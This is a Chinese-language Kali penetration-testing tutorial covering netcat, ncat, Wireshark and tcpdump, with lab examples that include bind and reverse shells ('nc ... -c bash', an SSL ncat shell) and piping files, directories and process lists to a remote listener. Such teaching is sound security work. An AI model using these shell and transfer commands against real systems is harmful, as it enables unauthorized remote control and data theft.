《Kali渗透基础》02. 基本工具
@
本系列侧重方法论,各工具只是实现目标的载体。
命令与工具只做简单介绍,其使用另见《安全工具录》。
本文以 kali-linux-2022.3-vmware-amd64 为例。
1:基本工具
1.1:NetCat
NetCat(又称为 " nc ")被广泛用于计算机网络之间的数据传输和网络调试。允许用户通过 TCP 或 UDP 协议发送和接收数据。
功能描述:
- 网络工具中的瑞士军刀
- 侦听模式/传输模式
- 传输文本信息
- 传输文件/目录
- 远程控制/木马
- 流媒体服务器
- 远程克隆硬盘
NC 缺乏加密和身份验证的能力
不同系统或平台的 NetCat 命令不尽相同。
1.1.1:命令参数
基本语法:
nc [选项]
常用选项:
| 参数 | 说明 | 例 |
|---|---|---|
-h |
显示帮助信息和参数选项。 | nc -h |
-l |
监听模式,等待连接请求到达指定的端口。 | nc -l 5555 详见示例01 |
-p 端口 |
指定要使用的端口号。 | |
-v |
显示详细的输出信息。 | nc -v baidu.com 80 |
-n |
使用 IP 地址时不进行 DNS 反向解析。 | nc -n 1.1.1.20 5555 |
-q 数字 |
指定连接建立或数据传输时的等待时间(单位:秒)。 | 详见示例02 |
-z |
端口扫描,默认使用 TCP 协议,无需建立实际连接。可指定端口范围。 | |
-u |
指定使用 UDP 协议进行数据传输。 | |
-c 命令或shell |
执行命令。可用于远程控制。 | 详见示例06、07 |
常用组合:
| 参数组合 | 说明 | 例 |
|---|---|---|
-nv |
主要用于建立连接 | nc -nv 1.1.1.20 3333 |
-nvz |
TCP 端口扫描 | nc -nvz 1.1.1.20 1-65535 |
-nvzu |
UDP 端口扫描 | nc -nvzu 1.1.1.20 1-1024 |
1.1.2:示例
- 示例01:⽂本信息传输。
操作:
先在一台主机上开启端口监听,再使用另一台主机连接。即可通信。
一、ubuntu(1.1.1.20):
nc -l [-p] 3333
二、kali(1.1.1.10):
nc -nv 1.1.1.20 3333
结果:

- 示例02:监听信息并保存。
操作:
一、kali(1.1.1.10):
nc -l [-p] 3333 > ps.txt
二、ubuntu(1.1.1.20):
ps aux | nc -nv 1.1.1.10 3333 -q 1
结果:
在 ubuntu 执行 ps aux 的结果会被保存在 kali 上的 ps.txt 。且完成后一秒自动断开连接。
- 示例03:主动传输文件。
操作:
一、kali(1.1.1.10):
nc -l 3333 > 1.txt
二、ubuntu(1.1.1.20):
nc -nv 1.1.1.10 3333 < 2.txt -q 1
结果:
ubuntu 上的 2.txt 文件传输到 kali 并被保存为 1.txt 。
- 示例04:被动接收文件。
操作:
一、kali(1.1.1.10):
nc -q 1 -l 3333 < 1.txt
二、ubuntu(1.1.1.20):
nc -nv 1.1.1.10 3333 > 2.txt
结果:
kali 上的 1.txt 文件被 ubuntu 接收并被保存为 2.txt 。
- 示例05:目录传输。
操作:
一、ubuntu(1.1.1.20):
tar -cvf - /test/ | nc -lp 3333 -q 1
二、kali(1.1.1.10):
nc -nv 1.1.1.20 333 | tar -xvf -
结果:
ubuntu 上的 /test/ 目录传输到 kali 上。
- 示例06:远程控制(被动连接)。
操作:
一、ubuntu(1.1.1.20):
nc -lp 3333 -c bash
二、kali(1.1.1.10):
nc 1.1.1.20 3333
结果:
ubuntu 被 kali 连接,kali 可远程执行 linux 命令。
注:Windows 用户可以把 bash 改成 cmd 。
- 示例07:远程控制(主动连接)。
操作:
一、kali(1.1.1.10):
nc -lp 3333
二、ubuntu(1.1.1.20):
nc 1.1.1.10 3333 -c bash
结果:
ubuntu 主动连接 kali,kali 可远程执行 linux 命令。
1.2:NCat
NCat是 Nmap 网络扫描器项目的一部分。可以视为 NetCat 工具的加强版。许多命令都与 NetCat 一致。
功能描述:
- 支持 SSL 和 TLS 加密协议。
- 支持身份验证,包括基于用户名和密码的身份验证。
1.2.1:命令参数
基本语法:
ncat [选项]
常用选项:
NCat许多命令都与 NetCat 一致。这里只列出特别的参数。
| 参数 | 说明 | 例 |
|---|---|---|
--allow |
访问控制。限制允许连接的 IP 地址范围。 | 详见示例01 |
--ssl |
使用SSL/TLS加密连接。 | 详见示例01 |
1.2.2:示例
- 示例01:
操作:
一、ubuntu(1.1.1.20):
ncat -c bash --allow 1.1.1.10 -vnl 3333 --ssl
二、kali(1.1.1.10):
ncat -nv 1.1.1.20 3333 --ssl
结果:
ubuntu 允许来自 IP 地址为 1.1.1.10 的主机连接。连接建立后执行 Bash 命令,并使用 SSL/TLS 加密进行连接。
1.3:WireShark
WireShark 是一款开源抓包软件,常用来检测网络问题、攻击溯源、或者分析底层通信机制(抓包嗅探、协议分析。)
基本使用方法:
这里只介绍大致过程。具体细节网络教学很多。
- 启动
- 选择抓包网卡
- 实时抓包
- 保存或分析捕获文件
- 首选项配置(添加展示信息,调整喜好的展示格式等)
筛选器:
用于过滤数据包。
- 抓包筛选器
- 显示筛选器
常见协议包:
需要熟悉常见协议数据包的分层结构。
数据流:
有时一个请求涉及多个包,一个一个查看很麻烦。这时追踪数据流可以方便查看涉及到的数据包信息。(追踪流)
信息统计:
WireShark 提供了一些信息统计功能。
- 节点数
- 协议分布
- 包大小分布
- 会话连接
- 解码方式
- 专家系统
1.4:TCPdump
TCPdump 是一款命令行抓包分析工具。Linux、Unix 系统默认安装。
1.4.1:命令参数
基本语法:
tcpdump [选项]
常用选项:
| 参数 | 说明 | 例 |
|---|---|---|
-i 网络接口 |
指定要监听的网络接口。 | tcpdump -i eth0 详见示例01 |
-s 数字 |
指定捕获数据包的最大长度(单位:字节。0 表示抓取所有)。默认为 64。 | tcpdump -s 100 详见示例02 |
-w 文件 |
将捕获的数据包写入文件。 | tcpdump -w test.pcap 详见示例02 |
-r 文件 |
从文件中读取数据包进行分析。 | tcpdump -r test.pcap 详见示例05、06、07 |
-A |
以 ASCII 形式显示数据包内容。 | |
-X |
以十六进制和 ASCII 形式显示数据包内容。 | 详见示例06 |
-v[v][v] |
显示详细信息,“ v ” 越多越详细。 | |
-n |
显示 IP 地址和端口号,不进行 DNS 解析。 | 详见示例05、06 |
src host ip地址 |
过滤条件。指定源主机。 | 详见示例04、05 |
dst host ip地址 |
过滤条件。指定目的主机。 | |
port 端口 |
过滤条件。指定端口。 | 详见示例06、07 |
tcp |
过滤条件。指定 TCP 协议。 | tcpdump tcp 详见示例07 |
udp |
过滤条件。指定 UDP 协议。 |
过滤条件可用 “ or ” 和 “ and ” 连接。
除了以上基础筛选过滤条件之外,TCPdump 还提供了高级筛选:

示例:

tcpdump -A -n 'tcp[13] = 24' -r http.cap
1.4.2:示例
- 示例01:开启抓包
操作:
tcpdump -i eth0
结果:

- 示例02:抓取数据包所有内容,并保存在 test.pcap 文件
tcpdump -i eth0 -s 0 -w test.pcap
- 示例03:查看抓包文件摘要信息
tcpdump -r test.pcap
- 示例04:抓取指定源地址的数据包
tcpdump src host 192.168.0.1 or src host 192.168.0.2
- 示例05:查看抓包文件中指定源地址的信息。
tcpdump -n src host 145.254.160.237 -r test.pcap
- 示例06:查看抓包文件中指定端口的信息,并以十六进制和 ASCII 形式显示数据包内容。
tcpdump -nX port 53 -r test.pcap
- 示例07:查看抓包文件中指定 tcp 端口的信息。
tcpdump tcp port 53 -r test.pcap
2:其他
渗透测试中有时需要团队资源共享,因此需要一些软件来协助团队合作。
包括但不限于以下两点:
- 数据文件共享
可以选择合适的软件以便于交换已获得的信息。
- 重要数据加密
选择合适的软件对重要的数据文件(如获得的漏洞信息等)加密存储。以免泄露造成损失。
落花有意随流水,流水无心恋落花。
——《警世通言》(明)冯梦龙
《Kali渗透基础》02. 基本工具的更多相关文章
- kali渗透-基础篇
渗透之meterpreter 模拟场景:小明是我室友,整天游戏人生,浑浑噩噩,前途迷茫,每次上课交作业都要看我的,于是我开启了apche服务器,给他下载作业(别问我为什么不用QQ传,因为要装逼!),他 ...
- Kali Linux渗透基础知识整理(四):维持访问
Kali Linux渗透基础知识整理系列文章回顾 维持访问 在获得了目标系统的访问权之后,攻击者需要进一步维持这一访问权限.使用木马程序.后门程序和rootkit来达到这一目的.维持访问是一种艺术形式 ...
- Kali Linux渗透基础知识整理(二)漏洞扫描
Kali Linux渗透基础知识整理系列文章回顾 漏洞扫描 网络流量 Nmap Hping3 Nessus whatweb DirBuster joomscan WPScan 网络流量 网络流量就是网 ...
- 小白日记20:kali渗透测试之后渗透测试阶段(一)--上传工具
后渗透测试阶段--上传工具 为防止管理员将漏洞补上后,我们无法再通过该漏洞控制对方主机,所以需要进行后渗透测试阶段 1.上传各种工具 2.提权:为了全面控制目标系统 3.擦除攻击痕迹:防止管理员通过日 ...
- kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail
kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail 相关链接:https://www.bbsmax.com/A/xl569l20Jr/ http://4hou.win/wordp ...
- 基础认证伪造工具phishery
基础认证伪造工具phishery 基础认证(Basic Authentication)被广泛应用内部网站.路由器等Web应用中.用户必须填写对应的用户名.密码才能访问Web资源.Kali Linu ...
- 渗透脚本快速生成工具Intersect
渗透脚本快速生成工具Intersect 当渗透人员获取目标系统的执行权限,往往需要编写相应的脚本,实现更多的渗透操作.Kali Linux提供一款Python脚本快速生成工具Intersect.该 ...
- kali渗透综合靶机(一)--Lazysysadmin靶机
kali渗透综合靶机(一)--Lazysysadmin靶机 Lazysysadmin靶机百度云下载链接:https://pan.baidu.com/s/1pTg38wf3oWQlKNUaT-s7qQ提 ...
- kali渗透综合靶机(十八)--FourAndSix2靶机
kali渗透综合靶机(十八)--FourAndSix2靶机 靶机下载地址:https://download.vulnhub.com/fourandsix/FourAndSix2.ova 一.主机发现 ...
- kali渗透综合靶机(十五)--Breach-1.0靶机
kali渗透综合靶机(十五)--Breach-1.0靶机 靶机下载地址:https://download.vulnhub.com/breach/Breach-1.0.zip 一.主机发现 1.netd ...
随机推荐
- vue全家桶进阶之路12:监听器 watch
在Vue2中,监听器(watch)用于监测数据的变化,并在数据变化时执行一些操作.监听器可以用来响应用户输入.观察数据变化.执行异步操作等. 监听器的使用方法如下: 在组件的watch选项中定义一个或 ...
- 啊哈C语言案例学习笔记
Hello World #include<stdio.h> /* 技术要点: 初学者在编写程序时,经常会忘记在语句后边添加分号, */ int main() { printf(" ...
- 代码随想录算法训练营Day18 二叉树| 654.最大二叉树 617.合并二叉树 700.二叉搜索树中的搜索 98.验证二叉搜索树
654.最大二叉树 题目链接:654.最大二叉树 给定一个不重复的整数数组 nums . 最大二叉树 可以用下面的算法从 nums 递归地构建: 创建一个根节点,其值为 nums 中的最大值. 递归地 ...
- 自然语言处理 Paddle NLP - 情感分析技术及应用SKEP-实践
Part A. 情感分析任务 众所周知,人类自然语言中包含了丰富的情感色彩:表达人的情绪(如悲伤.快乐).表达人的心情(如倦怠.忧郁).表达人的喜好(如喜欢.讨厌).表达人的个性特征和表达人的立场等等 ...
- 使用CosmosDB进行大规模数据的实时数据处理和流式传输
目录 使用 Cosmos DB 进行大规模数据的实时数据处理和流式传输 背景介绍 文章目的 目标受众 技术原理及概念 基本概念解释 技术原理介绍 相关技术比较 实现步骤与流程 准备工作:环境配置与依赖 ...
- -Xmx参数建议设置为系统内存的多少?
在设置 -Xmx 参数时,建议将其设置为系统内存的一定比例.具体的比例需要根据应用程序的特点.系统资源的限制等各种因素进行综合考虑. 如果将 -Xmx 参数设置得过小,可能会导致 JVM 分配的堆内存 ...
- ThinkPHP6.0 链式SQL语句
ThinkPHP6.0 链式SQL语句 查询单个数据 $user = Db::query('select * from `user`'); $user=Db::table('user')->wh ...
- Linux 图形栈从入门到放弃 --- Linux 图形相关概念简介
PS:要转载请注明出处,本人版权所有. PS: 这个只是基于<我自己>的理解, 如果和你的原则及想法相冲突,请谅解,勿喷. 环境说明 无 前言 在日常生活中,像我们常用的ubunt ...
- Unity的Console的控制类LogEntries:深入解析与实用案例
使用Unity Console窗口的LogEntries私有类实现自定义日志系统 在Unity开发过程中,我们经常需要使用Console窗口来查看程序运行时的日志信息.Unity内置的日志系统提供了基 ...
- RabbitMQ 多消费者 使用单信道和多信道区别
RabbitMQ 多个消费者共用一个信道实例 与 每个消费者使用不同的信道实例 区别: 1. 多个消费者共用一个信道实例:这种方式下,多个消费者共享同一个信道实例来进行消息的消费. 优点:这样可以减少 ...